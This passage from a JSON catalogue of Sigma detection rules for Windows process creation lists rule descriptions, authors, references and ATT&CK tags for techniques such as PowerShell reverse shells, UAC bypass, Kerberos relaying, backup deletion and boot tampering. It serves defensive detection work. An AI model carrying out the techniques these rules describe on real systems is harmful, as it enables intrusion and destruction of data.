], "filename": "proc_creation_win_wmic_recon_volume.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1047", "attack.t1082" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c79da740-5030-45ec-a2e0-479e824a562c", "value": "System Disk And Volume Reconnaissance Via Wmic.EXE" }, { "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_reg_modify_group_policy_settings.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1484.001" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", "value": "Modify Group Policy Settings" }, { "description": "Detects execution of renamed version of PAExec. Often used by attackers", "meta": { "author": "Florian Roth (Nextron Systems), Jason Lynch", "creation_date": "2021-05-22", "falsepositive": [ "Weird admins that rename their tools", "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "filename": "proc_creation_win_renamed_paexec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.poweradmin.com/paexec/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "value": "Renamed PAExec Execution" }, { "description": "Detects potential abuse of the \"register_app.vbs\" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-05", "falsepositive": [ "Other VB scripts that leverage the same starting command line flags" ], "filename": "proc_creation_win_lolscript_register_app.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", "https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", "value": "Potential Register_App.Vbs LOLScript Abuse" }, { "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", "meta": { "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "creation_date": "2019-10-24", "falsepositive": [ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "value": "Usage Of Web Request Commands And Cmdlets" }, { "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002", "attack.t1112" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "value": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE" }, { "description": "Detects potential web shell execution from the ScreenConnect server process.", "meta": { "author": "Jason Rathbun (Blackpoint Cyber)", "creation_date": "2024-02-26", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_remote_access_tools_screenconnect_webshell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blackpointcyber.com/resources/blog/breaking-through-the-screen/", "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b19146a3-25d4-41b4-928b-1e2a92641b1b", "value": "Remote Access Tool - ScreenConnect Server Web Shell Execution" }, { "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", "meta": { "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-03-03", "falsepositive": [ "In rare administrative cases, this function might be used to check network connectivity" ], "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", "value": "Potential Powershell ReverseShell Connection" }, { "description": "Detects the execution of \"forfiles\" with the \"/c\" flag.\nWhile this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.\nCan be used to bypass application whitelisting.\n", "meta": { "author": "Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2022-06-14", "falsepositive": [ "Legitimate use via a batch script or by an administrator." ], "filename": "proc_creation_win_forfiles_proxy_execution_.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "value": "Forfiles Command Execution" }, { "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-24", "falsepositive": [ "Legitimate use of the impacket tools" ], "filename": "proc_creation_win_hktl_impacket_tools.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml" ], "tags": [ "attack.execution", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "value": "HackTool - Impacket Tools Execution" }, { "description": "Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_krbrelay_remote.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/CICADA8-Research/RemoteKrbRelay", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelay_remote.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7664b14-75fb-4a50-a223-cb9bc0afbacf", "value": "HackTool - RemoteKrbRelay Execution" }, { "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_nolmhash.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98dedfdd-8333-49d4-9f23-d7018cccae53", "value": "Enable LM Hash Storage - ProcCreation" }, { "description": "Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.\nMeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.\n", "meta": { "author": "@Kostastsale", "creation_date": "2024-09-22", "falsepositive": [ "False positives can be found in environments using MessAgent for remote management, analysis should prioritize the grandparent process, MessAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host." ], "filename": "proc_creation_win_remote_access_tools_meshagent_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55", "https://github.com/Ylianst/MeshAgent", "https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_exec.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74a2b202-73e0-4693-9a3a-9d36146d0775", "value": "Remote Access Tool - MeshAgent Command Execution via MeshCentral" }, { "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/IDiagnosticProfileUAC", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", "value": "UAC Bypass Using IDiagnostic Profile" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" }, { "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", "meta": { "author": "Micah Babinski", "creation_date": "2022-12-11", "falsepositive": [ "Legitimate use of the tool by administrators or users to update metadata of a binary" ], "filename": "proc_creation_win_pua_rcedit_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/electron/rcedit", "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003", "attack.t1036", "attack.t1027.005", "attack.t1027" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "value": "PUA - Potential PE Metadata Tamper Using Rcedit" }, { "description": "Detects calls to \"LoadAssemblyFromPath\" or \"LoadAssemblyFromNS\" that are part of the \"CL_LoadAssembly.ps1\" script. This can be abused to load different assemblies and bypass App locker controls.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_cl_loadassembly.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "value": "Assembly Loading Via CL_LoadAssembly.ps1" }, { "description": "Detects AdFind execution with common flags seen used during attacks", "meta": { "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "creation_date": "2021-02-02", "falsepositive": [ "Legitimate admin activity" ], "filename": "proc_creation_win_pua_adfind_susp_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects", "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://www.joeware.net/freetools/tools/adfind/", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml" ], "tags": [ "attack.discovery", "attack.t1018", "attack.t1087.002", "attack.t1482", "attack.t1069.002", "stp.1u" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", "value": "PUA - AdFind Suspicious Execution" }, { "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", "meta": { "author": "Cian Heasley", "creation_date": "2020-08-13", "falsepositive": [ "Legitimate uses of Mouse Lock software" ], "filename": "proc_creation_win_pua_mouselock_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", "https://sourceforge.net/projects/mouselock/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1056.002" ] }, "related": [ { "dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", "value": "PUA - Mouse Lock Execution" }, { "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", "meta": { "author": "@gott_cyber", "creation_date": "2022-09-02", "falsepositive": [ "Since the content of the files are unknown, false positives are expected" ], "filename": "proc_creation_win_ldifde_file_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], "tags": [ "attack.command-and-control", "attack.defense-evasion", "attack.t1218", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "value": "Import LDAP Data Interchange Format File Via Ldifde.EXE" }, { "description": "Detects the stopping of a Windows service via the \"net\" utility.", "meta": { "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-05", "falsepositive": [ "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], "filename": "proc_creation_win_net_stop_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/net-service.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_stop_service.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88872991-7445-4a22-90b2-a3adadb0e827", "value": "Stop Windows Service Via Net.EXE" }, { "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n", "meta": { "author": "Micah Babinski, @micahbabinski", "creation_date": "2023-05-07", "falsepositive": [ "Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use." ], "filename": "proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.irongeek.com/homoglyph-attack-generator.php", "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32e280f1-8ad4-46ef-9e80-910657611fbc", "value": "Potential Homoglyph Attack Using Lookalike Characters" }, { "description": "Detects the deletion of backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-13", "falsepositive": [ "Legitimate backup activity from administration scripts and software." ], "filename": "proc_creation_win_wbadmin_delete_backups.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", "https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_delete_backups.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "value": "Windows Backup Deleted Via Wbadmin.EXE" }, { "description": "Detects suspicious encoded character syntax often used for defense evasion", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1281103918693482496", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", "value": "Potential PowerShell Obfuscation Via WCHAR" }, { "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", "value": "Boot Configuration Tampering Via Bcdedit.EXE" }, { "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-13", "falsepositive": [ "Some false positives may occur with other tools with similar commandlines" ], "filename": "proc_creation_win_pua_chisel.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 